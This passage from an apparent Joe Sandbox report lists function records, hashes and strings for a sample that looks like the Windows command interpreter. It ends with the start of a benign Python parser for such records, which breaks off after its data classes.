                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: exit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2483651598-0
                                                                                                                    • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                    • Instruction ID: 4dbe998938a1ccde1e2616bbed7b2ae8041d5d92cb94ab31587b1f58dbef165b
                                                                                                                    • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                    • Instruction Fuzzy Hash: 69C0123070464A47EB5C7F312495039AD757B09A12F585438C506812C2DD28D404C210
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF789BC6F97), ref: 00007FF789BD550C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DefaultLangUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 768647712-0
                                                                                                                    • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                    • Instruction ID: b3e7f2505f8ea5d480374330dc7198940b19325730d0eb0ab99fa22926170989
                                                                                                                    • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                    • Instruction Fuzzy Hash: 51E0C2A2D0A2578AF5553E41604A3B4AD73EB69F83FE44031C60E012C8D92D2841D228
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2221118986-0
                                                                                                                    • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                    • Instruction ID: 3f443d25ecd08591b5cfbccd7b12d507137f4fd42834ccc0b0fcd27fd9ea5c3f
                                                                                                                    • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                    • Instruction Fuzzy Hash: 0DF0B421B097C941EA409B56B544129A6A1AF88FF0B988330EE7C47BC9DE3CD451C300
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                                    • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                                    • API String ID: 1388555566-2647954630
                                                                                                                    • Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                                                    • Instruction ID: ed684149586c7772f909d9698dac3cba69d6f075b2ad4330e21b268a3fc0d939
                                                                                                                    • Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
                                                                                                                    • Instruction Fuzzy Hash: 15A2A131A08B8A86E710AF65A4141BDBFB5FB89F96FA08135DA0E47795DF3CE404C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                                                    • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                                                    • API String ID: 511550188-726566285
                                                                                                                    • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                    • Instruction ID: 5fb2a1cf58922f3949d909df9ed16affeaffed46278799c3cb35bc794d6bdc6d
                                                                                                                    • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                                    • Instruction Fuzzy Hash: 8052B022A0C69AC6EB64AF25A404279FEB1FB85F96FE44135D94E43794DF3CE844C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmp$wcschr$wcstol
                                                                                                                    • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                                                    • API String ID: 1738779099-3004636944
                                                                                                                    • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                    • Instruction ID: 6d66c87ee4713a03e26954df98a41873dc93a74a729a1ec9a6238ddf7e6bde0e
                                                                                                                    • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                                    • Instruction Fuzzy Hash: 51729131F0865A8AEB50AF65D4442BDBBB1FB44F9AFA18035DE0D57794EE3CA845C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7F44
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE7F5C
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7F9E
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7FFF
                                                                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8020
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8036
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8061
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8075
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE80D6
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE80EA
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE8177
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE819A
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81BD
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81DC
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81FB
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE821A
• _wcsnicmp.MSVCRT ref: 00007FF789BE8239
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8291
• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE82D7
• FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE82FB
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE831A
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8364
• RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8378
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE839A
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE83AE
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE83E6
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8403
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8418
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
• String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
• API String ID: 3637805771-3100821235
• Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
• Instruction ID: 95a809d78b5f4528f460f3fc67a900cbc97e4ce3cb9e141c7831a23fb608451d
• Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
• Instruction Fuzzy Hash: 56E16C31A08A5A8AE710AF65A40417DFEB5FB49F96BE58234DD1E53790EF3CE444C720
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
• String ID: %s$%s
• API String ID: 3623545644-3518022669
• Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
• Instruction ID: c96d18a2deac3f4d273b58a4d51c3d1ce05af7dbc234b6fa8ff133a95055b244
• Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
• Instruction Fuzzy Hash: 2BD2C731B0868A8AEB64AF61D4402BDBBB5FB45F5AFA04139DA0E47B95DF3CE504C710
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
• String ID: %9d$%s
• API String ID: 4286035211-3662383364
• Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
• Instruction ID: 5c9691b593a62c556ac3087bd5ac4c2a5e9a86ea0d48ee6cc46ee0495161f2f0
• Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
• Instruction Fuzzy Hash: 3A529532A087868AEB64AF64D8502FDBBB4FB85B9AFA04135DA0E47794DF3CD544C710
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcsrchr$towlower
• String ID: fdpnxsatz
• API String ID: 3267374428-1106894203
• Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
• Instruction ID: 2cb84c67287c8cbfbb5bc477a36bed1d0ae4ebf5f180dc331f87089aebb32f32
• Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
• Instruction Fuzzy Hash: 4F42B321B0968A86EB68AF2595182B9BFB1FF45F96FA44135DE4E07B84DF3CE441C310
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
• String ID: DPATH
• API String ID: 95024817-2010427443
• Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
• Instruction ID: f7e17d679d89f1c2506fcc1769d496c6e4458abb0e943576203c2e3d1857801c
• Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
• Instruction Fuzzy Hash: AB12B632A086868AE764AF21944017DFFB5FB89FA6FA45135EA4E57794DF3CE400CB10
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID:
• String ID: [...]$ [..]$ [.]$...$:
• API String ID: 0-1980097535
• Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
• Instruction ID: 6a43b09af20fded4de7a7ef429f9e8fa3e838a705e8161d42e4cb41c1c8c191f
• Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
• Instruction Fuzzy Hash: FE32BF32A0868A86EB20EF61D4442FDBBB4FB45F9AFA14135DA4D07695EF3CE505C720
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
• String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
• API String ID: 4111365348-3662956551
• Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
• Instruction ID: 938af7d0400e29b397411a3fa9f50ead7eebe23b0e677e4df856d82e3caf15e8
• Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
• Instruction Fuzzy Hash: 3CE1AE21A0864A86EB50AF65A8445BDFFB1FF84FAAFE44131D90E47695EE3CE504C720
Uniqueness
Uniqueness Score: -1.00%

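The per-function records above all follow one layout (an optional API list, a Memory Dump Source block, the IDA plugin snapshot, a Similarity block with the API/String/Opcode IDs and fuzzy hashes, and a Uniqueness score). To hunt for the same function across other reports, for example by Opcode ID or Instruction Fuzzy Hash, it helps to have those records in structured form. The parser below is an added example written for this page, not code from Joe Sandbox or from the report's tooling. Its sample input is constructed from the records shown here. The decoding of the `.sdmp` file name (base address in the fourth field, page protection in the fifth, memory type in the seventh, mapped to the Win32 `PAGE_*` and `MEM_*` constants) is an assumption inferred from the values on this page, where the region the functions are listed under carries 0x20 and the data regions carry 0x02/0x04; the report does not document that layout.

```python
"""Parse Joe Sandbox per-function records into structured entries (added example)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# ASSUMPTION: .sdmp name fields 5 and 7 are the Win32 page protection and memory type.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# "Name.Module(args), ref: ADDR" or "Name.Module ref: ADDR" as printed in the APIs list.
API_RE = re.compile(r"^(?P<name>[^.(\s]+)\.(?P<module>[^\s(]+)(?:\((?P<args>[^)]*)\))?"
                    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int

@dataclass
class DumpRegion:
    name: str
    pid_index: int
    run: int
    base: int
    protect: str
    mem_type: str

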